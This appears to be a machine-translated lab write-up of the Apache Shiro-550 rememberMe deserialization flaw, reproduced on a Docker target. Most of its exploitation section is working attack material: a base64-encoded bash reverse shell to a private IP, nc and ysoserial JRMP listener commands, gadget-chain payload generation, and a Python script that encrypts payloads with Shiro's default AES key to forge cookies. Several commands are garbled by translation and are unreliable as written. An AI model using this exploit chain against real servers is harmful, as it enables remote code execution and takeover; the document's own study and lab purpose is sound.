preface

Recently, I have been sorting out my notes, and happened to encounter Shiro deserialization vulnerability in my internship. In line with the idea of reviewing the old and knowing something new, I studied the articles of my predecessors, sorted out my notes and wrote an article.

1. Introduction to Apache Shiro

Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, password, and session management. Using Shiro’s easy-to-understand apis, developers can quickly and easily access any application, from the smallest mobile applications to the largest web and enterprise applications.

Shiro rememberMe deserialization vulnerability (Shro-550)

2.1 Affected version

Apache Shiro < = 1

2.2 Feature judgment

The return package contains the rememberMe=deleteMe field

2.3 Vulnerability Principle

In Shiro <= 1.2.4, the AES encryption key used in the deserialization process is hardcoded in the source code. When users check RememberMe and login successfully, Shiro will serialize the cookie value of the user. After that, base64 encoding is stored in the rememberMe field of cookies. Upon receiving the login request, the server will base64 decode the cookie value of rememberMe, then perform AES decryption and deserialization. Because AES encryption is symmetric (key encrypts data as well as decrypts it), when an attacker knows the AES key, he can construct a malicious rememberMe cookie value that triggers the deserialization vulnerability.

3. Vulnerability recurrence

3.1 Environment Construction

// Get the docker image

docker pull medicean/vulapps:s_shiro_1

// Start the container

docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

2021 Network security/penetration testing/security learning /100 SRC technical documents (full set of videos, CTF, DACHeng Classics, boutique manuals, essential kits, routes

3.2 Preparing Tools

3.2.1 configure maven

1. Download Maven

Maven.apache.org/download.cg…

Win10 Maven environment variables and IDEA Maven environment

zhuanlan.zhihu.com/p/48831465

3.2.2 Download and package the ySOSerial tool

Download: github.com/frohoff/yso…

The packaged ysoSerial is in the ysoserial/target file

Git clone github.com/frohoff/yso…

cd ysoserial

mvn package -D skipTests

PS: Finally finished packing, I didn’t expect Maven source to change ali Cloud speed is still a little slow.

3.3 Vulnerability Detection

The shiro_tool.jar tool is used to check whether Shiro has a default key.

Java – jar shiro_tool. Jar at http://192.168.31.81:8080/

3.4 Vulnerability utilization

3.4.1 Method 1: NC Rebound shell

1. Make bounce shell code

First, in Kali, listen on the local port through NC,

nc -lvp 4444

Using Java Runtime with bash encoding,

Bash - > I & / dev/TCP / 192.168.31.81/4444 > 0 and 1

Results:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
Copy the code

2. Use JRMP listening module of ySOSerial tool to listen port 6666 and execute rebound shell command.

Java - cp ysoserial - 0.0.6 - the SNAPSHOT - all. Jar ysoserial. Exploits. JRMPListener 6666 CommonsCollections4 'bash - c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'Copy the code

3. Generate payload using the detected AES key

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

Popen = subprocess. popen ([‘ Java ‘, ‘-jar’, ‘ysoserial-0.0.6-snapshot-all. jar’, ‘JRMPClient’, command], stdout=subprocess.PIPE)

BS = AES.block_size

pad = lambda s: s + ((BS – len(s) % BS) * chr(BS – len(s) % BS)).encode()

key = base64.b64decode(“kPH+bIxk5D2deZiIxcaaaA==”)

iv = uuid.uuid4().bytes

encryptor = AES.new(key, AES.MODE_CBC, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if name == ‘main‘:

payload = encode_rememberme(sys.argv[1])

print “rememberMe={0}”.format(payload.decode())

When Python2 uses PIP to install Crypto, there are various problems, the most important problem is the lack of various errors reported in the Crypto.Cipher module, Google Baidu found a lot of crazy PIP installation and uninstall, but could not solve the problem, and then simply adopted manual installation of Crypto module. Finally it was settled.

ImportError: No module named Crypto.Cipher

— > Manually download the Crypto package to install

Download: pypi.org/simple/pycr…

Error: command ‘x86_64-linux-GNU – GCC’ failed with exit status 1

— > Install dependency libraries

apt-get install build-essential python-dev libssl-dev libffi-dev libxml2 libxml2-dev libxslt1-dev zlib1g-dev

Use test_shiro550.py to generate payload

Python test_shiro550. Py 192.168.31.81:6666

4. Construct packets with the generated rememberMe value, forge cookies, and send requests.

5. Check the NC listening result. The shell is successfully bounced.

Nc successfully bounces the shell, and the whoami command is used to query the root permission.

3.4.2 Method 2: Executing commands

1. Use ySOSerial tool to generate POC

Java -jar ysoserial-0.0.6- snapshot-all. jar CommonsBeanutils1 "echo 'test shiro-550' > / TMP /SUCCESS" > poCCopy the code

2. Use Shiro default AES Key to encrypt payload

Brupsuite captures packages and sends requests with forged rememberMe cookies.

4. Check the/TMP directory of the target server and verify that the SUCCESS file is generated.

5, summary

The root cause of shro-550 vulnerability is that the AES encrypted key is hardcoded in the source code, so that attackers can use the leaked AES key to forge rememberMe field to generate cookie values, resulting in deserialization vulnerability. => serialize =>AES encryption =>base64 encoding => create a RememberMe cookie value.